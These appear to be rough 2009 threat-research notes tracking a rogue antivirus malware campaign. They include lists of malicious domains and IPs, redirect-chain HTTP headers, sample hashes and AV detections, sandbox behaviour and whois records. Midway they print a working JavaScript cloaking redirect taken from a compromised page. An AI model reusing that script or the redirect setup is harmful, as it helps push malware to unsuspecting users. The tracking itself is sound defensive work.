ULTRANET AS UltraNet Ltd

*.go-iascan. com 
*.goscan-pro. com 
*.goscanpc. com 
*.ia-free-scanner. com 
*.ia-payment-pro. com 
*.ia-payment. com 
*.ia-scanpro. com 
*.iascan-pro. com 
*.inspred. com 
*.internet-antivirus-2008. com 
*.stased. com 
bestproscan.com
go-scan-pro. com 
gobestscan. com
goscanpc. com
goscan-pro. com 
ia-payment-pro. com 
ia-payment. com 
ia-scanpro. com 
iabestscan.com
iascan-pro. com 
iascanner-pro. com 
iascannerpro. com 
inspred. com 
internet-antivirus-2008. com 
internet-antivirus-pro. com 
mail.gobestscan. com 
mail.goscan-pro. com 
mail.ia-payment-pro. com 
mail.ia-payment. com 
mail.ia-scanpro. com 
mail.iascan-pro. com 
mail.iascanner-pro. com 
mail.iascannerpro. com 
mail.inspred. com 
mail.internet-antivirus-2008. com 
mail.internet-antivirus-pro. com 
mail.stased. com 
mail.wa-payment. com 
ns.goscan-pro. com 
ns.ia-payment. com 
ns.ia-scanpro. com 
ns.iascan-pro. com 
ns.inspred. com 
ns.internet-antivirus-2008. com 
ns.stased. com 
ns.wa-payment. com 
ns1.avmyscan. com 
ns1.avproinstall. com 
ns1.avproscan. com 
ns1.avprostat. com 
ns1.avscanpro. com 
ns1.go-your-scan. com 
ns1.gobestscan. com 
ns1.gomyscan. com 
ns1.goyourscan. com 
ns1.ia-download. com 
ns1.ia-payment-pro. com 
ns1.ia-payment. com 
ns1.ia-scanpro. com 
ns1.iascan-pro. com 
ns1.iascanner-pro. com 
ns1.iascannerpro. com 
ns1.inspred. com 
ns1.internet-antivirus-pro. com 
ns1.scanavpro. com 
ns1.stased. com 
ns1.wa-payment. com 
ns2.go-iascan. com 
ns2.goscan-pro. com 
ns2.goscanpc. com 
ns2.ia-free-scanner. com 
ns2.ia-scanner-pc. com 
ns2.iascanner-pro. com 
ns2.internet-antivirus-2008. com 
ns2.wa-payment. com 
ns3.ia-payment-pro. com 
ns3.ia-payment. com 
ns3.wa-payment. com 
stased. com 
wa-payment. com 
www.stased. com 
cname 
stased. com
go-iascan. com
avproscan. com
ia-free-scanner. com
goscanpc. com
avprostat. com Robtex
avmyscan. com
go-your-scan. com
goyourscan. com
ia-scanner-pc. com
   

78.159.100.22  
   
line4scan. com  
log4scan. com  
   

78.159.101.11  
   
megascan4. com  
safe4scan. com  
scanmain4. com  
   

78.159.101.22  
   
homescan4. com  
justscan4. com   
leadscan4. com  
now4scan. com  
scan4tool. com  
tool4scan. com  
   

78.159.101.27  
   
any4scan.comMarch 19 new!Wepapet (Redirection)
anyscan4. comMarch 17 new!VirusTotal - Anubis
base4scan. com  
data4scan.comMarch 19 new! 
datascan4. comMarch 17 new!VirusTotal - Anubis
scan4zoom. com  
in4ik. com VirusTotal
in4is. com  
in4co. com Wepapet (Redirection)
in4sk. com ThreatExpert
goscanit. com  
goanyscan. com  
gofullscan. com  
gofusescan. com  
goscanany. com  
goscanbay. com  
goscanever. com  
goscanfull. comMarch 13 
goscanfuse. com  
goscanlist.comMarch 20 new!Wepapet Red.1 - Red.2
goscanmind. com  
goscanonly. com  
goscanopen. com  
goscanslot. com  
goscanway. com  
goscanwith. com  
gotruescan. com  
gotscan. com  
gowayscan. com  
litescan4. com  
main4scan.com  
mega4scan. com  
nowscan4. com  
nowscan6. com  
scan4any.comMarch 21 new 
scan4data.com March 22 new!  
scan4lite.com March 22 new!  
scan4home. com  
scan4step.comMarch 20 new! 
scanlog4. com  
scanmega4. comInternetAntivirusProThreatExpert
scansafe4. com  
scanstep4. com  
scantool4. comMarch 13VirusTotal - ThreatExpert
scanuser4.com  
scanzoom4. com  
stepscan4. com  
true4scan.comMarch 22 new! 
truescan4. com  
user4scan. com  
   

lol


78.159.99.52  
   
5goscan. com  
best4scan. com  
ever4scan. com  
gomyscan. com  
goscan4. com  
   

194.165.4.20ThreatExpert 
   
onlinestabilityexamine. comReport 
   

194.165.4.7ThreatExpertAnubisOther
209.160.20.117   
    
fast-antimalware-scanner. comReport  
    
91.212.65.43   
antivirus-xp-pro-2009. com ReportAnalysis
SetupAntivirusXP.exe   
    
EUROHOST-NET,91.212.65.0,91.212.65.255

91.203.92.18191.203.92.184 
   
gosafescan. com  
live4scan. com  
new4scan. com  
scan4new. com  
   

194.165.4.140 -AS48669 - NTCOLO-AS NTCOLO
  
av1scan. com 
avscan1. com 
avpayments. com 
easy6scan. comAnalysis
fast6scan. com 
general-antivirus. com 
generalantivirus. com 
gomainscan. com[Google Template]
goopenscan. com 
goproscan. com 
goscanbase. com[Redirect to Google with GeoIP]
goscanlead. com[Redirect to Google with GeoIP]
goscanline. com 
goscantrue. com 
goscanuser. com 
goscansafe. com 
gozoomscan. com 
ia-pro. com 
in1sk. com 
internetantiviruspro. com 
new4scan. com 
scan4new. com 
scan4plus. com 
  

194.165.4.41 - AS48669 - NTCOLO-AS NTCOLO
   
ns1.avscan1. com  
ns1.av1scan. com  
bestscan4. com  
bestscan6. com  
best6scan. comGoogle red.Analysis
bestscan6. comGoogle red.Analysis - Article
cokien. com  
easy4scan. com  
fast4scan. com  
fastscan4. com  
gobestscan. com  
goscantrue. com  
just4scan. com  
lead4scan. com  
live6scan. com  
livescan4. com  
livescan5. com  
livescan6. com  
new6scan. com  
newscan4. com  
newscan6. com  
plus4scan. com  
plus6scan. com  
plusscan4. com  
plus6scan. com  
plusscan4. com  
scan4easy. com  
scan4ever. com  
scan4fast. com  
scan4now. com  
scan6best. com  
scan6live. com  
scanbest4. com  
scaneasy4. com  
scanfast4. com  
scanlive4. com  
scanplus4. com  
scannew4. com  
   

others(Suspended or not served)
  
4scanav. com 
av4snscan. com 
av5scan. com 
avscan5. com 
basescan4. com 
ever6scan. com 
everscan4. com  
gatescan4. com 
gate4scan. com 
home4scan. com 
in7co. com 
new7scan. com 
newscan5. com 
pro4scan. com 
scanav4. com 
scanav5. com 
scan4line. com 
scan4main. com 
scan4safe. com 
scan6new. com 
scan4best. com 
scan4log. com 
scan4pro. com 
scan7live. com 
scanline4. com 
scanlive4. com 
plusscan6. com 
  

Some Redirection:
 
hxxp://098765. com/in.php
hxxp://lastpoher.ru/in.php
hxxp://x-more-x.net/in.php
hxxp://infidelirium.info/in.php
 
hxxp://texasvino. com
hxxp://87.248.163.58/in.php?s=texasvino. com
hxxp://onlinestabilitysite. com/index.php?affid=07105
hxxp://tool4scan. com/26/?uid=12602
 

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 07:43:28 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache
Content-Length: 0
Location: hxxp://87.248.163.58/in.php?s=texasvino. com

hxxp://87.248.163.58/in.php?s=texasvino. com

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 09:41:34 GMT
Server: Apache/2.0.55 (Unix) PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: alreadyvisited=0; expires=Fri, 06-Mar-2009 19:41:34 GMT
Location: hxxp://onlinestabilitysite. com/hitin.php?land=20&affid=07105
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

hxxp://onlinestabilitysite. com/hitin.php?land=20&affid=07105

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 15:42:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
location: index.php?affid=07105
Content-Length: 0
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

hxxp://onlinestabilitysite. com/index.php?affid=07105

(Status-Line): HTTP/1.1 200 OK
Date: Fri, 06 Mar 2009 15:42:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
Keep-Alive: timeout=1, max=99
Connection: Keep-Alive
Transfer-Encoding:chunked
Content-Type: text/html

*****************************

hxxp://87.248.163.58/in.php?s=texasvino. com

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 09:49:28 GMT
Server: Apache/2.0.55 (Unix) PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: alreadyvisited=1; expires=Fri, 06-Mar-2009 19:49:28 GMT
Location: hxxp://goscanbay. com/?uid=12602
Content-Length: 0
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html

hxxp://goscanbay. com/?uid=12602

(Status-Line): HTTP/1.1 302 Found
Server: nginx/0.6.34
Date: Fri, 06 Mar 2009 07:50:14 GMT
Content-Type: text/html
Transfer-Encoding:chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.8
location: hxxp://tool4scan. com/?uid=12602

hxxp://tool4scan. com/26/?uid=12602

******************************

hxxp://sendsometraff. com/in.php

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 14:13:37 GMT
Server: Apache/2.0.55 (Unix) PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: alreadyvisited=1; expires=Sat, 07-Mar-2009 00:13:37 GMT
Location: hxxp://goscanbay. com/?uid=12602
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

hxxp://goscanbay. com/?uid=12602

(Status-Line): HTTP/1.1 302 Found
Server: nginx/0.6.34
Date: Fri, 06 Mar 2009 12:14:22 GMT
Content-Type: text/html
Transfer-Encoding:chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.8
location: hxxp://tool4scan. com/?uid=12602

hxxp://tool4scan. com/?uid=12602

******************************

hxxp://zorroless. com/in.php

(Status-Line): HTTP/1.1 302 Found
Date: Fri, 06 Mar 2009 14:12:46 GMT
Server: Apache/2.0.55 (Unix) PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: alreadyvisited=1; expires=Sat, 07-Mar-2009 00:12:46 GMT
Location: hxxp://goscanbay. com/?uid=12602
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

hxxp://goscanbay. com/?uid=12602

(Status-Line): HTTP/1.1 302 Found
Server: nginx/0.6.34
Date: Fri, 06 Mar 2009 12:13:31 GMT
Content-Type: text/html
Transfer-Encoding:chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.8
location: http://tool4scan. com/?uid=12602

hxxp://tool4scan. com/?uid=12602

******************************

hxxp://info4us. info/in.php?v=28

(Status-Line):HTTP/1.1 302 Found
Date:Mon, 16 Mar 2009 16:15:16 GMT
Server:Apache/1.3.41 (Unix) PHP/5.2.8
X-Powered-By:PHP/5.2.8
Location:http://onlinestabilityworld. com/hitin.php?land=21&affid=16400
Connection:close
Transfer-Encoding:chunked
Content-Type:text/html

hxxp://onlinestabilityworld. com/hitin.php?land=21&affid=16400
hxxp://onlinestabilityworld. com/index.php?c=0&affid=16400

*********************************

87.248.163.58

hxxp://zorroless. com/in.php
hxxp://hola-aloha. net/in.php
hxxp://x-more-x. net/in.php
hxxp://sendsometraff. com/in.php

hxxp://goscanbay. com (78.159.101.27)

...........

202.75.63.116/202.75.63.117ThreatExpert
  
u-cleaner. biz 
ultimatecleaner. bizReport
uprotect. bizReport
xprotect. us Report
  
  

 More interestingly, a google search fo "Facebook virus" reveal this page:

hxxp://2009022118.kuj2doo.bee.pl/facebook_error_check_system.html

Script below:

 
var r = document.referrer;

if (r.indexOf("google") != - 1 || r.indexOf("msn") !=
- 1 || r.indexOf("yahoo") != - 1 || r.indexOf("search") != - 1 ||
r.indexOf("result") != - 1 || r.indexOf("cache") != - 1 ||
r.indexOf("translate") != - 1)
{

document.location = "http://murtinreid. com/in.php?n=1500&s=" + escape(location.hostname) + "&p=" + escape(r).replace(/\+/g, "%2B")

} else {

document.title = "404 Not Found";
document.write("<h1>Not Found</h1>The requested URL " + location.pathname + " was not found on this server.<p><hr><address>Apache/1.3.39 Server at " + location.hostname + " Port 80</address><div style='display:none'>")

}

 
On Friday, 6 March 8:00 AM - PST

hxxp://murtinreid. com/in.php? (87.248.163.58)
redirect to same site as
onlinedetect. com, 0day33hours. com, allradiohits. com

The first time you will be redirect to

hxxp://stabilityaudit. com/hitin.php?land=20&affid=07105 (209.44.126.22)

and when you return to the same link you will be redirect to another site

hxxp://goscanbay. com/?uid=12602 (The redirection - 78.159.101.27)
then
hxxp://tool4scan. com/?uid=12602 - 78.159.101.27
(or other, depending your country, IP, language etc...)

coincidence or related...

***
Same redirection:
098765. com/in.php | lastpoher. ru/in.php | x-more-x.net/in.php
ahuliard. com |
***

The redirection change every day with new domain purchased.

Sample below...
 

Found on March 3:

March 5710131422
       
gohardscan. com   Analysis  
gointoscan. com    Analysis 
golistscan. com    Analysis 
gomodescan. com    Analysis  
goonlyscan. com    AnalysisAnalysis
goplanscan. com    Analysis 
goportscan. com    Analysis 
goquickscan. com   Analysis  
goscanany. com   Analysis  
goscanbay. com   Analysis  
goscanever. com      
goscanfull. com   Analysis  
goscanfuse. com      
goscanhard. com   Analysis  
goscaninto. com      
goscanit. comAnalysis  Analysis  
goscanlist. com       
goscanmind. com   Analysis  
goscanmode. com   Analysis Analysis
goscanonly. com   Analysis  
goscanopen. com  AnalysisAnalysis  
goscanport. com   Analysis  
goscanquick. com   Analysis  
goscanslot. com   Analysis  
goscantrue. com      
goscanway. com   Analysis  
goscanwith. com   Analysis  
goslotscan. com    Analysis 
onlinestabilityguide. com    Analysis 
onlinestabilitysite. com      
onlinestabilityscanada. com      
onlinestabilityworld. com    Analysis 
scanaonline. com    Analysis 
thestabilityscan. com Analysis    
yourstabilityscan. com      
       

scan4gate. comAnalysis from Google 
scan4gate. com  
scan4user. comSymantecMcAfee Site Advisor
scan4zoom. com  
scan6ever. com  
scan6gate. comRedirect to Google 
scanever6. comRedirect to Google 
scangate4. comRedirect to Google 
scangate6. com  
scanhome4. com  
scanhome6. com   
   

The Google redirection is removed is the HTTP_REFERER match
a domain in this list!! You will be redirect to another
site like scan4just. com etc...

Found on March 6

safetyexamine. com  
tool4scan. com  
onlinestabilitysite. com  
   

Found on March 7

now4scan. com  
scanlead4. com  
easywinscanner17. comContinue here 
easywinscanner17. com/maldef09_2/4/10108  
(78.159.122.156 - 84.16.243.169)  
   

Found on March 8

thestabilityscan. com  
   

Found on March 9

stabilityscandirect. com  
scanlog4. com  
mega4scan. comMcAfee Site Advisor - 2Google
   

Found on March 10

goscanopen. comGoogle Safe Browsing Diagnostic 
scan4mega. comGoogle Safe Browsing Diagnostic 
   

Found on March 11

scan4just. comGoogle Safe Browsing Diagnostic 
   

Found on March 12

 March 13 
   
litescan4. com Analysis 
scansafe4. com  
scanzoom4. com  
   

Found on March 13

scantool4. comAnalysis on March 13 
scanvistanow.netAnalysis on March 13Also download file
from 94.75.228.147
hosted-by.leaseweb. com
stepscan4. com   
Reverse IP lookup  

Found on March 14

user4scan. comJS Analysis on March 14 
  
MD5: 754d4813959d15ce5863681399b81592 
   
hxxp://user4scan.com/22/?uid=keyin
hxxp://user4scan.com/nag/?uid=144&n=nag&install=1
hxxp://user4scan.com/download/install.php
hxxp://in4co.com/cki.php?uid=keyin
   
File: install.exeInternetAntivirusPro.exefile.exe
   
VirusTotal AnalysisVirusTotalVirusTotal
Iseclab AnubisIseclab AnubisIseclab Anubis
ThreatExpertThreatExpertThreatExpert
   
Analysis Report for install.exe | file.exe 
   
Ikarus Virus Scanner: Rootkit.Win32.TDSS (Sig-Id:455680)
   
   
HTTP Conversations
   
hxxp://78.159.101.27:80 - [in4sk. com]  
   
Request: GET /download/file.exe  
Response: 200 "OK"  
Request: GET /download/file.exe  
Response: 206 "Partial Content"  
Request: GET /download/InternetAntivirusPro.exe  
Response: 200 "OK"  
Request: GET /download/InternetAntivirusPro.exe  
Response: 206 "Partial Content"  
Request: GET /reports/download-report.php?prod_id=9
Response: 200 "OK"  
   
Registry Values Modified 
   
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Run
C:\​Documents and Settings\​user\​Application Data\​Microsoft\​Windows\​winlogon.exe
   
File Created  
   
C:\Documents and Settings\user\Application Data\Microsoft\Windows\winlogon.exe (Process Activities)
c:\program files\Common Files\file.exe
c:\program files\Common Files\InternetAntivirusPro.exe
c:\program files\Internet Antivirus Pro\
C:\DOCUME~1\user\LOCALS~1\Temp\is-L32VH.tmp
C:\DOCUME~1\user\LOCALS~1\Temp\is-L32VH.tmp\InternetAntivirusPro.tmp
   
Analysis Report for InternetAntivirusPro.exe 
   
FakeAlert-AB [McAfee] 
Mal/FakeAV-M [Sophos] 
   

ISSA Journal

Rash of Rogue Security Malware
pandalabs.pandasecurity.com
---
msmvps
malwarebytes
malwaredatabase

ZeuS Tracker abuse.ch

Spammer & cybercrime hosting (escalation)
 
Some malicious activies - ZLKON

94.247.3.213/32
SBL72391 Malware/virus dropper gang

94.247.3.232/32
SBL71685 imp-porntube. net / filesfreedb. com malware codec gang

94.247.2.0/23
SBL70871 zlkon. lv cybercrime spammer hosts

94.247.3.235/32
SBL70870 SECURITYADVIZR. COM etc

94.247.3.10/32
SBL70869 zazerfox. com / ns1.agns. co.cr / etc

94.247.3.9/32
SBL70868 zazerfox. com / ns1.agns. co.cr / etc

94.247.2.0/24
SBL70568 Malware DNS server NS2.MANAGEHOSTDNS .COM

94.247.2.11/32
SBL70308 Malware dropper -fake AV software: antivirus-pro-scanner .com

94.247.2.217/32
SBL70042 Canadian Pharmacy
Canadian Pharmacy image host

94.247.2.216/29
SBL70040 Canadian Pharmacy
Canadian Pharmacy image hosts
 

Domain Whois record
Queried whois.nic.lv with "zlkon. lv"...

domain: zlkon. lv
admin-c: 86617-LUMII
tech-c: 86617-LUMII
nserver: ns1.zlkon.lv
nserver: ns2.zlkon.lv
changed: dns-reg@nic.lv 20081121
source: LUMII

person: <hidden>
address: none
phone:+371 26330593
e-mail: arkadzi.daniyelian@zlkon. lv
nic-hdl: 86617-LUMII
source: LUMII

Network Whois record
Queried whois.ripe.net with "-B 94.247.2.0"...

inetnum:94.247.2.0 - 94.247.3.255
netname:ZLKON
descr: ZlKon
country:LV
admin-c:ZK508-RIPE
tech-c: DES31-RIPE
status: ASSIGNED PA
mnt-by: PCEXPRESS-MNT
mnt-lower: ZLKON-MNT
mnt-routes: ZLKON-MNT
changed:igors@pcexpress. lv 20081125
source: RIPE

role: ZlKon HostMaster
address:Lilijas iela 4-74
address:Riga, LV-1055
address:Latvija
phone: +371 26330593
e-mail: hostmaster@zlkon. lv
admin-c:AD5952-RIPE
tech-c: AD5952-RIPE
nic-hdl:ZK508-RIPE
mnt-by: ZLKON-MNT
changed:hostmaster@zlkon. lv 20081125
source: RIPE
abuse-mailbox: abuse@zlkon. lv

role: DATORU EXPRESS SERVISS HostMaster
address:18. novembra street 319C
address:Daugavpils, LV-5413
address:Latvia
phone: +371 26631339
fax-no: +371 65420725
remarks:Information: http://www.pcexpress. lv
remarks:Questions: hostmaster@pcexpress. lv
e-mail: hostmaster@pcexpress. lv
admin-c:IV745-RIPE
tech-c: IV745-RIPE
nic-hdl:DES31-RIPE
mnt-by: PCEXPRESS-MNT
changed:igors@pcexpress. lv 20081125
source: RIPE
abuse-mailbox: abuse@pcexpress. lv

% Information related to '94.247.0.0/21AS12553'

route: 94.247.0.0/21
descr: "DATORU EXPRESS SERVISS" Ltd.
origin: AS12553
mnt-by: PCEXPRESS-MNT
changed:igors@pcexpress. lv 20081121
source: RIPE

   


Link: Google Safe Browsing Diagnostic for an infected domain

Youtube video lead to Rogue AntiSpyware - Antivirus360
MalwareDefender2009 - EasyWinScanner17 - FakeSpyGuard
Antivirus360 - Crucialsoft ltd ms antispyware 2009
Compromised websites used to spread malware


active domains on March 16:

goeasyscan.com
(Microsoft Template)
  
goscanbay. comRedirect to ------>scantool4. com
litescan4. com
go4scan. comRedirect to ------>leadscan6. com (Analysis)
goscanfull,com
gohardscan. com
goscanfull. com
goscanhard. com
goscanopen. com
gomodescan. com
goscanmind. com
goscanport. com
goscanquick. com
goscanslot. com
goscanway. com
goscanwith. com
goquickscan. com
goscanany. com
goscanmode. com
gotscan. com
On March 11-12-13
Redirect to ------>

On March 14
Redirect to ------>

On March 16
Redirect to ------>

(Analysis)
stepscan4. com

(Analysis)
user4scan. com

(Analysis)
datascan4. com
anyscan4. com
   
bestfiresfull. com 209.44.126.22
onlinestabilityguide. com209.44.126.22
onlinestabilityworld. com209.44.126.22
onlinewebscan. com94.247.2.215
scanaonline. com 
securityscandirect. comhousedomainname. cn/in.cgi?6
info4us. info/in.php?v=28onlinestabilityworld. com
vistastabilitynow. com209.44.126.14
wwwprotectionread. com 
webstabilityscan. com94.247.3.74
wwwsafetyscan. com  
   
March 17 addition:ANYSCAN4.COM 
 SCANSTEP4.COM 
 TRUESCAN4.COM 
   
   
   

Today, we change, this is not the go4scan go5scan
scan4main scan4 etc..... but a fake porntube site

hxxp://zorroless. com/in.php
hxxp://hola-aloha. net/in.php
hxxp://x-more-x. net/in.php
hxxp://sendsometraff. com/in.php

Redirect to

hxxp://tube-funs-world.com/promo2/?aid=561&vname=free_dvd_rip

The site ask me to download free_dvd_rip.exe

File size: 2862989 bytes
MD5...: f35144147bfd9a7e47e4ae7d79d9b2d1

Result: 4/39 (10.26%)

VirusTotal: Permalink
ThreatExpert: Permalink RogueAntispyware-sysguard

or

hxxp://tube-funs-world.com/promo2/2.php?aid=561&vname=stream_player_plugin

stream_player_plugin.exe

File size: 3159829 bytes
MD5...: 5cf2fcaaac2863b850aabd96f85c5ed8

Result: 4/39 (10.26%)

VirusTotal: Permalink

eSafe [Win32.SPRFraud.PrivC]
Sus/Behav-113 [Sophos]
Privacy components [Sunbelt]
Adware/Agent.gen [TheHacker]


Hosted on 78.26.179.34


gooscan